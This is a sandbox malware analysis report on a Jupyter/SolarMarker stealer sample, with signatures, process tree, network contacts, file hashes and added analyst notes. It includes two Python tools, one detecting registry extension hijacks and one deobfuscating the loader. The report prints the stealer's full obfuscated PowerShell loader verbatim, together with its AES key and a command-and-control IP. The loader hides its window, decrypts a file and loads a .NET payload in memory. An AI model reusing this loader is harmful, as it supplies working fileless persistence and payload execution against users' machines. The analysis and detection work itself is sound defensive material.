Malware Analysis Report

2024-10-24 18:08

Sample ID 220613-abeldsgfe4
Target 1d4ab34baa9e5c2cc73ec2788ca8d849befe8c0ef5d8fdd5b7a4bed5de6ebaff.7z
SHA256 6828ce39fa7de6c4efabe1c7b6d19213c56d094c12731ff035bd114408e52263
Tags
jupyter backdoor stealer suricata trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

6828ce39fa7de6c4efabe1c7b6d19213c56d094c12731ff035bd114408e52263

Threat Level: Known bad

The file 1d4ab34baa9e5c2cc73ec2788ca8d849befe8c0ef5d8fdd5b7a4bed5de6ebaff.7z was found to be: Known bad.

Malicious Activity Summary

jupyter backdoor stealer suricata trojan

suricata: ET MALWARE Jupyter Stealer CnC Checkin

Jupyter, SolarMarker

Jupyter family

Blocklisted process makes network request

Drops startup file

Program crash

Modifies registry class

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

N/A

Analysis: static1

Detonation Overview

Reported

2022-06-13 00:03

Signatures

Jupyter family

jupyter

Analysis: behavioral1

Detonation Overview

Submitted

2022-06-13 00:01

Reported

2022-06-13 00:09

Platform

win10-20220414-en

Max time kernel

307s

Max time network

311s

Command Line

"C:\Users\Admin\AppData\Local\Temp\1d4ab34baa9e5c2cc73ec2788ca8d849befe8c0ef5d8fdd5b7a4bed5de6ebaff.exe"

Signatures

Jupyter, SolarMarker

backdoor trojan stealer jupyter

suricata: ET MALWARE Jupyter Stealer CnC Checkin

suricata

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Drops startup file

Description | Indicator | Process | Target
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AAkseLakVWShCAFBIqeAz.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Modifies registry class

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\.rhycuoqczmgclvgvil | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\.rhycuoqczmgclvgvil\ = "jplfkwrqxarlkfumjaublhevlrnzqaj" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\jplfkwrqxarlkfumjaublhevlrnzqaj\shell\open\command | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\jplfkwrqxarlkfumjaublhevlrnzqaj | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\jplfkwrqxarlkfumjaublhevlrnzqaj\shell | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\jplfkwrqxarlkfumjaublhevlrnzqaj\shell\open | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\jplfkwrqxarlkfumjaublhevlrnzqaj\shell\open\command\ = "powershell -command \"$showWindowAsync=Add-Type -MemberDefinition ('['+'D'.ToUpper()+'ll'.ToLower()+'I'.ToUpper()+'mport('.ToLower()+[char]0x22+'user32.dll'.ToLower()+[char]0x22+')]public static extern bool '.ToLower()+'S'.ToUpper()+'how'.ToLower()+'W'.ToUpper()+'indow'.ToLower()+'A'.ToUpper()+'sync('.ToLower()+'I'.ToUpper()+'nt'.ToLower()+'P'.ToUpper()+'tr hWnd, int nCmdShow);'.ToLower()) -Name ('W'.ToUpper()+'in32'.ToLower()+'S'.ToUpper()+'how'.ToLower()+'W'.ToUpper()+'indow'.ToLower()+'A'.ToUpper()+'sync'.ToLower()) -Namespace Win32Functions -PassThru;$showWindowAsync::ShowWindowAsync((Get-Process -Id $pid).MainWindowHandle, 0);$AC=New-Object System.Security.Cryptography.AesCryptoServiceProvider;$AC.Key=[Convert]::FromBase64String('SuzlSBEybt+4l4GorDHHnbdEjW5soZLDzFJs4SVeMJ0=');$EB=[Convert]::FromBase64String([IO.File]::ReadAllText('C:\\Users\\Admin\\AppData\\Local\\Temp\\SuMZpQaKehWXVEkKQuHyLIZz\\ybWylzucNKVPS.rhyCuOqCZmgcLvgvIl'));$AC.IV = $EB[0..15];$Decryptor=$AC.CreateDecryptor();$UB=$Decryptor.TransformFinalBlock($EB, 16, $EB.Length-16);$AC.Dispose();[Reflection.Assembly]::Load($UB);[F26y7_MVUpgqQtmoaaDj.RJt6RD8GBp9hWlC5Gbu11nR9257QVV1qfUfdMGc0QJhbcaHbl95wlIt0RvEZQXgar4zx]::UupaQTjrkgVL7jhlnNjwwOfoiDFmEk6eD5fN96jMuScriboS9_bVDY8MwON3Lmr_VqfUsde9ih0S5aB1amydC9k();\"" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
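The registry rows above form one persistence chain: a fabricated per-user file extension (.rhycuoqczmgclvgvil) is mapped to a ProgID (jplfkwrqxarlkfumjaublhevlrnzqaj) whose shell\open\command is a PowerShell loader, so any file with that extension, for example the target of a Startup-folder shortcut like the .lnk dropped above, launches the loader when opened. The report does not show the .lnk target, so that pairing is inferred from the technique rather than read off the page. The Python below is an added example, not part of the sandbox report: it correlates registry Set-value events into extension -> ProgID -> open-command chains and flags the ones whose handler is a script host rather than an application. The event list is constructed from the table rows (the PowerShell value is abbreviated; the full command is in the table), and the .myapp mapping is a made-up benign control so the detector has something to ignore.

```python
import re

# Registry events from the "Modifies registry class" table, normalised to
# (action, key path, value). Constructed sample input; a Sysmon Event ID 12/13 feed
# or a sandbox JSON export maps to the same shape. The PowerShell value is abbreviated.
HIVE = "\\REGISTRY\\USER\\S-1-5-21-3297182285-798020602-2032295036-1000_Classes"
REGISTRY_EVENTS = [
    ("Key created",     HIVE + "\\.rhycuoqczmgclvgvil", None),
    ("Set value (str)", HIVE + "\\.rhycuoqczmgclvgvil\\", "jplfkwrqxarlkfumjaublhevlrnzqaj"),
    ("Key created",     HIVE + "\\jplfkwrqxarlkfumjaublhevlrnzqaj\\shell\\open\\command", None),
    ("Set value (str)", HIVE + "\\jplfkwrqxarlkfumjaublhevlrnzqaj\\shell\\open\\command\\",
     'powershell -command "$showWindowAsync=Add-Type -MemberDefinition (...) ..."'),
    # Made-up benign mapping (not from the report) so the detector has a negative case.
    ("Set value (str)", HIVE + "\\.myapp\\", "MyApp.Document"),
    ("Set value (str)", HIVE + "\\MyApp.Document\\shell\\open\\command\\",
     '"C:\\Program Files\\MyApp\\myapp.exe" "%1"'),
]

# A trailing backslash on the key path denotes the key's (Default) value, as in the report.
EXT_DEFAULT = re.compile(r"^(?P<hive>.*_Classes)\\(?P<ext>\.[^\\]+)\\$")
CMD_DEFAULT = re.compile(r"^(?P<hive>.*_Classes)\\(?P<progid>[^\\.][^\\]*)\\shell\\open\\command\\$")
SCRIPT_HOSTS = ("powershell", "pwsh", "wscript", "cscript", "mshta", "rundll32", "regsvr32")


def find_script_host_extension_hijacks(events):
    """Correlate per-user Classes writes into extension -> ProgID -> open command chains
    and return the chains whose handler is a script host rather than an application."""
    ext_to_progid = {}
    progid_to_cmd = {}
    for action, path, value in events:
        if not action.startswith("Set value") or value is None:
            continue  # key creation alone carries no handler information
        m = EXT_DEFAULT.match(path)
        if m:
            ext_to_progid[(m["hive"], m["ext"].lower())] = value
            continue
        m = CMD_DEFAULT.match(path)
        if m:
            # Registry names are case-insensitive, so match ProgIDs case-folded.
            progid_to_cmd[(m["hive"], m["progid"].lower())] = value

    findings = []
    for (hive, ext), progid in ext_to_progid.items():
        command = progid_to_cmd.get((hive, progid.lower()))
        if command is None:
            continue
        host = next((h for h in SCRIPT_HOSTS if h in command.lower()), None)
        if host is None:
            continue
        findings.append({
            "hive": hive,
            "extension": ext,
            "progid": progid,
            "host": host,
            # Long all-letter extensions are a weak secondary signal; the verdict
            # is driven by the script-host handler, not by this flag.
            "random_looking": len(ext) > 8 and ext[1:].isalpha(),
        })
    return findings


if __name__ == "__main__":
    for f in find_script_host_extension_hijacks(REGISTRY_EVENTS):
        print(f"{f['extension']} -> {f['progid']} -> {f['host']} "
              f"(random-looking extension: {f['random_looking']})")
```

Running it on the constructed events reports exactly the .rhycuoqczmgclvgvil -> jplfkwrqxarlkfumjaublhevlrnzqaj -> powershell chain and ignores the .myapp control. The correlation is keyed on the hive so that two users' Classes trees are never mixed.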

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Processes

C:\Users\Admin\AppData\Local\Temp\1d4ab34baa9e5c2cc73ec2788ca8d849befe8c0ef5d8fdd5b7a4bed5de6ebaff.exe

"C:\Users\Admin\AppData\Local\Temp\1d4ab34baa9e5c2cc73ec2788ca8d849befe8c0ef5d8fdd5b7a4bed5de6ebaff.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ep0525dx\ep0525dx.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFD12.tmp" "c:\Users\Admin\AppData\Local\Temp\ep0525dx\CSC170DC3D0F86249CCA0BE8FEC46F733E.TMP"

Note: csc.exe and cvtres.exe are not dropped tools. Windows PowerShell's Add-Type -MemberDefinition (see the shell\open\command value above) compiles the P/Invoke stub for user32!ShowWindowAsync with the .NET C# compiler, which is what produces the ep0525dx\*.cs, *.cmdline and *.dll files and the RESFD12.tmp resource file listed under Files. A csc.exe child of powershell.exe is therefore a reliable marker of in-memory C# compilation, here used to hide the console window before the payload is loaded.

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 3728 -s 936

Note: WerFault.exe is Windows Error Reporting collecting a crash report for PID 3728 (the -p argument); this is the "Program crash" signature listed in the overview, and the same PID heads the memory dumps under Files.
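The loader command stored in the shell\open\command value above builds its C# P/Invoke declaration from case-flipped string fragments and [char] casts so that no literal "DllImport" or "user32.dll" appears on disk, then AES-decrypts a file whose first 16 bytes are the IV and reflectively loads the result. The Python below is an added example, not part of the sandbox report: it statically evaluates that concatenation idiom without executing any PowerShell and extracts the analyst-relevant indicators (the compiled stub that spawned csc.exe above, the AES key, the payload path and the entry point). The command constant is copied from the registry table with the report's \" and \\ escaping undone. decrypt_payload mirrors the loader's own steps (AesCryptoServiceProvider defaults to CBC with PKCS7 padding) for use on a recovered .rhyCuOqCZmgcLvgvIl file; no such file is included in this report, so it is not exercised here, and it needs the third-party cryptography package.

```python
import base64
import re

# shell\open\command value from the registry table, with the report's \" and \\ escapes undone
# so it reads as the PowerShell actually executed. Copied from the page, not captured live here.
SHELL_OPEN_COMMAND = r'''powershell -command "$showWindowAsync=Add-Type -MemberDefinition ('['+'D'.ToUpper()+'ll'.ToLower()+'I'.ToUpper()+'mport('.ToLower()+[char]0x22+'user32.dll'.ToLower()+[char]0x22+')]public static extern bool '.ToLower()+'S'.ToUpper()+'how'.ToLower()+'W'.ToUpper()+'indow'.ToLower()+'A'.ToUpper()+'sync('.ToLower()+'I'.ToUpper()+'nt'.ToLower()+'P'.ToUpper()+'tr hWnd, int nCmdShow);'.ToLower()) -Name ('W'.ToUpper()+'in32'.ToLower()+'S'.ToUpper()+'how'.ToLower()+'W'.ToUpper()+'indow'.ToLower()+'A'.ToUpper()+'sync'.ToLower()) -Namespace Win32Functions -PassThru;$showWindowAsync::ShowWindowAsync((Get-Process -Id $pid).MainWindowHandle, 0);$AC=New-Object System.Security.Cryptography.AesCryptoServiceProvider;$AC.Key=[Convert]::FromBase64String('SuzlSBEybt+4l4GorDHHnbdEjW5soZLDzFJs4SVeMJ0=');$EB=[Convert]::FromBase64String([IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\SuMZpQaKehWXVEkKQuHyLIZz\ybWylzucNKVPS.rhyCuOqCZmgcLvgvIl'));$AC.IV = $EB[0..15];$Decryptor=$AC.CreateDecryptor();$UB=$Decryptor.TransformFinalBlock($EB, 16, $EB.Length-16);$AC.Dispose();[Reflection.Assembly]::Load($UB);[F26y7_MVUpgqQtmoaaDj.RJt6RD8GBp9hWlC5Gbu11nR9257QVV1qfUfdMGc0QJhbcaHbl95wlIt0RvEZQXgar4zx]::UupaQTjrkgVL7jhlnNjwwOfoiDFmEk6eD5fN96jMuScriboS9_bVDY8MwON3Lmr_VqfUsde9ih0S5aB1amydC9k();"'''

# Tokens of the obfuscation idiom: a single-quoted literal with an optional .ToUpper()/.ToLower(),
# or a [char]0xNN cast. Everything else ('+', parentheses) is skipped by finditer.
CONCAT_TOKEN = re.compile(r"""
    '(?P<lit>[^']*)'(?:\.To(?P<case>Upper|Lower)\(\))?   # 'literal' plus optional case flip
  | \[char\]0x(?P<hex>[0-9A-Fa-f]{1,4})                   # [char]0x22 is the double quote
""", re.VERBOSE)


def deobfuscate_concat(expr):
    """Statically evaluate a PowerShell string built from case-flipped literals and [char]
    casts joined with '+'. Nothing is executed."""
    parts = []
    for m in CONCAT_TOKEN.finditer(expr):
        if m.group("lit") is not None:
            s = m.group("lit")
            if m.group("case") == "Upper":
                s = s.upper()
            elif m.group("case") == "Lower":
                s = s.lower()
            parts.append(s)
        else:
            parts.append(chr(int(m.group("hex"), 16)))
    return "".join(parts)


def extract_loader_iocs(command):
    """Pull the pieces an analyst needs from the loader command: the P/Invoke stub that
    Add-Type hands to csc.exe, the AES key, the encrypted payload path and the entry point."""
    member_def = re.search(r"-MemberDefinition\s+\((.*?)\)\s+-Name\s", command).group(1)
    type_name = re.search(r"-Name\s+\((.*?)\)\s+-Namespace\s", command).group(1)
    key_b64 = re.search(r"FromBase64String\('([A-Za-z0-9+/=]+)'\)", command).group(1)
    payload_path = re.search(r"ReadAllText\('([^']+)'\)", command).group(1)
    # The only [Type]::Method(); call with no arguments is the post-load entry point.
    ns, method = re.findall(r"\[([\w.]+)\]::(\w+)\(\);", command)[-1]
    key = base64.b64decode(key_b64)
    return {
        "member_definition": deobfuscate_concat(member_def),
        "type_name": deobfuscate_concat(type_name),
        "aes_key": key,
        "aes_key_bits": len(key) * 8,   # a 32-byte key selects AES-256
        "payload_path": payload_path,
        "entry_point": f"{ns}::{method}",
    }


def decrypt_payload(blob_b64, key):
    """Offline mirror of the loader's decryption: the file is Base64 of IV (16 bytes) || ciphertext,
    decrypted with AES-CBC and PKCS7 padding (AesCryptoServiceProvider defaults). Requires the
    'cryptography' package; imported lazily so the rest of the module works without it."""
    from cryptography.hazmat.primitives import padding
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    blob = base64.b64decode(blob_b64)
    iv, ct = blob[:16], blob[16:]
    dec = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
    padded = dec.update(ct) + dec.finalize()
    unpad = padding.PKCS7(128).unpadder()
    return unpad.update(padded) + unpad.finalize()   # the .NET assembly the loader passes to Assembly.Load


if __name__ == "__main__":
    for name, value in extract_loader_iocs(SHELL_OPEN_COMMAND).items():
        print(f"{name}: {value!r}")
```

The recovered member definition is the plain-text stub the obfuscation was hiding, `[DllImport("user32.dll")]public static extern bool ShowWindowAsync(IntPtr hwnd, int ncmdshow);` (the .ToLower() calls also fold the parameter names, which C# tolerates), and the type name is Win32ShowWindowAsync. The key, payload path and entry point are what to pivot on in a memory dump or file-system triage of an infected host.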

Network

Country | Destination | Domain | Proto
US | 20.42.65.90:443 | - | tcp
RO | 37.120.247.120:80 | 37.120.247.120 | tcp

The report does not state which of these two connections triggered the "ET MALWARE Jupyter Stealer CnC Checkin" Suricata rule; the 37.120.247.120 destination is contacted by raw IP with no hostname.

Files

memory/3728-117-0x00000000005D0000-0x00000000015D0000-memory.dmp

memory/1016-118-0x0000000000000000-mapping.dmp

memory/1016-123-0x000001594BA40000-0x000001594BA62000-memory.dmp

memory/1016-142-0x0000015964600000-0x000001596463C000-memory.dmp

memory/1016-153-0x00000159646C0000-0x0000015964736000-memory.dmp

memory/3776-230-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\ep0525dx\ep0525dx.cmdline

MD5 99bcd1c19fb29827fb47c00f2f10c264
SHA1 93d6c983b6938564a00519eab58da5fa72dc13f4
SHA256 8e23f2c03d3ab8f70e1b9c083bfd749219e2327a67efb3c0edd5f15f10df12e9
SHA512 afdf1f6c0c711d6dcabb35e00c579e83a696fa25c538e07342ba3fb2deb84680e80e1f43ace3f6b6ed1b38694ed85040777c36a673fc1d22c9762fe0a45867cf

\??\c:\Users\Admin\AppData\Local\Temp\ep0525dx\ep0525dx.0.cs

MD5 2f9b4948ac0b26204994e246094a9f5d
SHA1 9870e53ad61eba593a2074d2a30202f7e3df09f7
SHA256 def6ec20884e30f8689cb1ccb8fb62735db528c5277f52f64ecae170cfd49776
SHA512 ef5f9056b36c8f9204a65b26244f225a9c2cc3bf5b1c46055e6eda06e63769243538b568b29627eb497289777fa69468e64b5eae0fb666bbb2e432a3059154d1

memory/160-233-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\ep0525dx\CSC170DC3D0F86249CCA0BE8FEC46F733E.TMP

MD5 f75144a068d98ca775e45b05a7609d9f
SHA1 5af5a7eb16553a66f6013362b439b52be4a80b5a
SHA256 0399de1e3b7746572693e6f2161e8a31e14608b29304240cf0b967b94b3b45de
SHA512 9562092f6ee4185d154192424d63bc2a5675f458ce48dd3042075aa85a1af1ea6ab0397a0720ccbeb49516029ec07b7e5d0b0d02ed434fe0dc63928f52f25bda

C:\Users\Admin\AppData\Local\Temp\RESFD12.tmp

MD5 0b2c9f1a68309a879e2fa3eb0ed42191
SHA1 f108a9b65bd91d95551f1bbd5cde2d2596364a05
SHA256 6cf0e222a3be64aa34fe63baffa1ffba4e0818d2e74a83f74f9d4c7d8030ace3
SHA512 69bcb1327f20abf5b8f198fb84a8e9627953e1f2ad95e2ea765b503e54f4630557f14fc851a5b9d65d163e0db91b4770165025a780e4e850c049b2d584c27b45

C:\Users\Admin\AppData\Local\Temp\ep0525dx\ep0525dx.dll

MD5 33d01500a8b7aae1f1f9bf7bb0a84ff1
SHA1 5ba1575702f2540b0bbf45355ce1c58baf8d2199
SHA256 b3f5bd1696f11e4409f0c8686b3ef5c66fe58008b9267052cec1563329c29db1
SHA512 3f475092c3aa0e776a6532eae919a4205347670bff95d73e5c6960d32009a35e885fb719531ae973c443b200b704608102a0c65f6a372f7e10d9430089ebbca4

memory/1016-237-0x00000159642A0000-0x00000159642A8000-memory.dmp

memory/3984-326-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 2143b379fed61ab5450bab1a751798ce
SHA1 32f5b4e8d1387688ee5dec6b3cc6fd27b454f19e
SHA256 a2c739624812ada0913f2fbfe13228e7e42a20efdcb6d5c4e111964f9b620f81
SHA512 0bc39e3b666fdad76bcf4fe7e7729c9e8441aa2808173efc8030ce07c753cb5f7e25d81dd8ec75e7a5b6324b7504ff461e470023551976a2a6a415d6a4859bfa

memory/1016-376-0x0000015964740000-0x00000159647EC000-memory.dmp